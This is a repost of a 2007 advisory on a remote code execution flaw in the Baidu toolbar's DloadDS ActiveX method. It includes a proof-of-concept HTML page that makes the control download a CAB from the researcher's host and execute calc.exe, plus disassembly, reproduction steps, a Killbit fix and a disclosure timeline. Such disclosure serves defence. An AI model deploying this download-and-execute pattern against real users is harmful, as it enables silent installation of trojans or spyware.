百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码

最新推荐文章于 2024-05-23 08:00:00 发布
最新推荐文章于 2024-05-23 08:00:00 发布
阅读量1.2k 收藏
点赞数
文章标签: 百度 工具 公告 javascript 浏览器 url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiwish/article/details/1722974
版权

来源:http://seclists.org
百度搜霸工具条出现高危漏洞,访问恶意网页,会下载木马执行,最新版本的工具条也受漏洞影响。百度搜霸的C:/Program Files/baidubar/BaiduBar.dll 文件提供ActiveX接口供网页进行调用,但是其中的DloadDS函数,允许攻击者在受害机器上执行任意代码。

DloadDS函数提供三个参数,分别是url地址,执行文件名,和是否显示。当url以.cab结尾时,搜霸会下载此文件到临时目录,随后以exe方式执行。
测试地址为:
http://ruder.cdut.net/attach/baidu_soba/baidu_soba_exploit.html
点击测试之后会运行calc.exe(计算器)
详细资料参见:http://seclists.org/fulldisclosure/2007/Aug/0015.html

 

//<html>
//<head>
//<script>

//function DowndloadCalcAndRun()

//{

//	com.DloadDS("http://ruder.cdut.net/attach/calc.cab","calc.exe",0);

//}

//</script>

//</head>

//<OBJECT ID="com" CLASSID="CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}"></OBJECT>

//<button οnclick="javascript:DowndloadCalcAndRun();">DowndloadCalcAndRun</button>

//</html>
 
 
--------------------------------------

百度超级搜霸远程代码执行漏洞
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
    百度超级搜霸是百度公司出品的一款免费的浏览器工具栏,提供百度公司的各种服务。更多信息请参考:
http://bar.baidu.com/sobar/promotion.html
    在百度超级搜霸中的一个ActiveX控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码,进而可安装木马以及间谍程序。
Affected Software Versions:
    百度超级搜霸5.4(Version of "BaiduBar.dll" is 2.0.2.144)
Details:
    漏洞存在于由ActiveX控件"BaiduBar.dll"导出的"DloadDS()"函数中,相关信息如下:
    InprocServer32:    C:/Program Files/baidu/bar/BaiduBar.dll
    ClassID      :     A7F05EE4-0426-454F-8013-C41E3596E9E9
    [id(0x0000001d), helpstring("method DloadDS")]
    void DloadDS(
                [in] BSTR bstrUrl, 
                [in] BSTR bstrName, 
                [in] long lShow);
    如果把bstrUrl设置成某个服务器上的CAB文件,DloadDS()函数会尝试下载这个文件到TEMP目录并解压,然后执行其中的以bstrName命名的文件,执行处的关键代码如下:
    .text:1006F407                 lea     eax, [ebp-28h]
    .text:1006F40A                 lea     ecx, [ebp-10h]
    .text:1006F40D                 push    eax            ; lpProcessInformation
    .text:1006F40E                 lea     eax, [ebp-6Ch]
    .text:1006F411                 push    eax            ; lpStartupInfo
    .text:1006F412                 push    esi            ; lpCurrentDirectory
    .text:1006F413                 push    esi            ; lpEnvironment
    .text:1006F414                 push    esi            ; dwCreationFlags
    .text:1006F415                 push    esi            ; bInheritHandles
    .text:1006F416                 push    esi            ; lpThreadAttributes
    .text:1006F417                 push    esi            ; lpProcessAttributes
    .text:1006F418                 push    esi
    .text:1006F419                 call    sub_10004147        ; get the CommandLine
    .text:1006F419
    .text:1006F41E                 push    eax            ; lpCommandLine
    .text:1006F41F                 push    esi            ; lpApplicationName
    .text:1006F420                 call    ds:CreateProcessA
     此时lpCommandLine指向"C:/DOCUME~1/administrator/LOCALS~1/Temp/calc.exe",由于之前没有任何有效的检查措施,因此攻击者可构造包含木马或者间谍程序的CAB文件,然后用DloadDS()函数下载并运行它。因此,有漏洞的百度搜霸相当于一个完美的后门。
How to Reproduce:
    Exploit在如下URL地址:
http://ruder.cdut.net/attach/baidu_soba/baidu_soba_exploit.html
    安装百度搜霸, 用IE打开它并点击"DowndloadCalcAndRun"按纽,你会发现计数器程序(在http://ruder.cdut.net/attach/calc.cab)被下载并执行。
    如果你无法找到受影响的版本,带有数字签名的百度搜霸5.4版在如下地址也可以下载到:
http://ruder.cdut.net/attach/baidu_soba/setup.exe
    此文件的MD5值:7F751A157AF42E92FDD0AF3F179FE9AB
Solution:
    Baidu通知已经修复了此漏洞,但实际上,从http://bar.baidu.com/sobar/promotion.html下载的Baidu搜霸依旧受到影响(MD5值没变,不过可能是在线更新未成功),强烈建议用户对此CLSID设置Killbit。
Disclosure Timeline:
    2007.07.19        漏洞发现并通知厂商
    2007.07.19        厂商回应
    2007.07.23        厂商通知新版本发布但不发布公告
    2007.07.24        新版本未发布成功
    2007.08.01        厂商再次通知新版本发布,但仍未完全修复
    2007.08.02        发布公告
[UPDATE]:Baidu看到此公告后修正了错误,2007.8.2中午从http://bar.baidu.com/sobar/promotion.html上下载的程序已经修复了此漏洞。

hiwish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
任意文件读取 下载漏洞总结_任意文件下载漏洞
m0_60607675的博客
04-09 635
while(!可以看到没有对传入的参数做任何限制,所以产生了文件下载漏洞
baidu.zip_com baidu searchbox_com.baidu.searchbox_javascript_sit
09-21
百度搜JavaScript代码,百度搜索排行
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
任意文件读取/下载漏洞
最新发布
qq_68163788的博客
05-23 2350
任意文件读取/下载漏洞是一种常见的网络安全漏洞攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
任意文件下载漏洞
qq_62414152的博客
12-18 4037
任意文件下载
【网络安全】任意文件下载漏洞
边缘拼命划水的小陈
04-26 797
许多web端都会提供下载功能,当点击当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包一个需要下载文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。3. 尝试使用相对路径获取服务器敏感文件/etc/passwd(linux系统)/也没问题,即使超过根目录也可以进行识别。指定下载路径不可遍历目录。
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8712
文件读取漏洞文件下载漏洞文件漏洞三者结合,靶场练习
Web的基本漏洞--任意文件读取与下载漏洞
尽欢的博客
06-05 2238
任意文件读取漏洞介绍、任意文件下载漏洞介绍、常见的敏感文件
任意文件下载漏洞利用分析和防御方法
白帽黑客鹏哥的博客
12-20 1704
任意文件下载漏洞是指攻击者可以通过特制的URL请求,绕过服务器的安全检查,下载服务器上任意文件。这通常是由于服务器端对用户请求的文件路径没有进行足够的过滤或验证,导致攻击者可以通过构造特殊的URL请求来访问服务器上任意文件。为了修复任意文件下载漏洞,服务器端需要对用户请求的文件路径进行严格的过滤和验证,防止攻击者通过构造特殊的URL请求来访问服务器上任意文件。一旦发现任意文件下载漏洞,就可以利用它来下载服务器上的任意文件。例如,可以通过以下步骤利用任意文件下载漏洞下载服务器上的。
任意文件下载漏洞概述、复现、利用、危害、修复方案
白帽子凯哥聊黑客
12-20 1435
任意文件下载是一种允许攻击者从目标服务器下载任意文件攻击类型。这可能导致严重的安全漏洞,例如泄露敏感信息、获取对服务器的未经授权的访问,甚至完全控制服务器。
转载:任意下载文件漏洞
qq_43907122的博客
02-28 541
edusrc--某985任意文件下载 00demons00 2023-02-26 20:28:24 文章来自于公众号:WK安全 欢迎大家多多支持 免责声明 由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 打开url:http://xxxxxxx/login 目测是一个RuoYi框架,根据以往的历史漏洞曝光,有以下这些: 1、shiro默认
web渗透测试----7、任意文件读取、下载漏洞
七天
12-23 6076
文章目录一、漏洞介绍二、漏洞危害三、常见形式1、任意文件读取2、任意文件下载的方式四、漏洞绕过1、未进行任何防御2、双写进行绕过3、利用编码进行绕过4、利用%00截断后缀绕过5、利用文件路径绕过五、常见的敏感文件六、漏洞修复 一、漏洞介绍 网站给用户提供了文件读取和下载的功能,但是没有对查看和下载功能做过多限制,未对用户输入的文件名作安全校验处理,导致用户可以查看和下载任意文件文件读取和下载在PHP和JAVA语⾔中尤为常见,主要出现文件操作的功能点。 PHP中功能点: file_get_conten
【靶场实战】Pikachu靶场不安全的文件下载漏洞关卡详解
晚风不及你
02-02 694
Pikachu是一个带有漏洞的Web应用系统,在这里包了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。文件下载功能在很多web系统上都会出现,一般我们点击下载链接,便会向后台发送一个下载请求,一般这个请求会包一个需要下载文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载
任意文件下载漏洞知识点
千寻的博客
05-08 3210
文章目录资料下载任意文件下载漏洞描述利用条件漏洞危害漏洞发现链接上参数上案例漏洞利用利用原理windows路径linux路径修复建议摘抄 资料下载 点击 下载 https://download.csdn.net/download/qq_41901122/18467497 任意文件下载 漏洞描述 文件下载处由于未对下载路径进行过滤,利用路径回溯符…/跳出程序本身的限制目录实现来下载任意文件,如下载系统密码文件等! 利用条件 存在读文件的函数 读取文件的路径用户可控且未校验或校验不严 输出了文件内容 漏洞
任意文件下载漏洞的利用思考
C20220511的博客
12-20 1174
需要说明的是,并不是所有的tomcat项目的controller源码都能在WEB-INF/classes/目录下找到,还有部分系统会把逻辑代码写到jar包中并放在WEB-INF/lib/目录下,如图3.8所示,某系统在classes目录下不存在任何class文件,所有的逻辑均在WEB-INF/*.jar包中。在CodeIgniter框架中,如果Cookie中包了序列化的内容,如图4.3所示,则代表可以通过任意文件读取获取加密key来构造反序列化过程,结合框架本身的反序列化利用链,则可能造成反序列化漏洞
Samba任意代码执行漏洞的危害
06-10
如果Samba服务器存在任意代码执行漏洞攻击者可以通过该漏洞在服务器上执行恶意代码,从而带来以下危害: 1. 数据泄露:攻击者可以利用漏洞窃取服务器上存储的敏感数据,如用户密码、金融信息等。 2. 操作系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值